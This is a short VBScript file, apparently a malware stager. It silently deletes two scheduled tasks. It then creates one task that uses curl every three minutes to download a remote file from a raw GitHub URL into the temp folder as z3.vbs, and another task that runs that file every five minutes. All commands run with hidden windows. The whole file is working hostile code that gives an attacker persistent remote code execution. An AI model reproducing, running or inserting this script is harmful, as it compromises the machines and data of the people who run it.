Set sp = CreateObject("WScript.Shell")
sp.Run ("schtasks /Delete /tn ""A3"" /F"), 0, True

Set sk = CreateObject("WScript.Shell")
sk.Run ("schtasks /Delete /tn ""A4"" /F"), 0, True

Set sy = CreateObject("WScript.Shell")
sy.Run ("schtasks /Create /sc minute /mo 3 /tn ""A5"" /tr ""curl https://raw.githubusercontent.com/section10housing/b1/master/z3.txt -o %tmp%\z3.vbs"" /F"), 0, False

Set s1 = CreateObject("WScript.Shell")
s1.Run ("schtasks /Create /sc minute /mo 5 /tn ""A6"" /tr ""%tmp%\z3.vbs"" /F"), 0, False



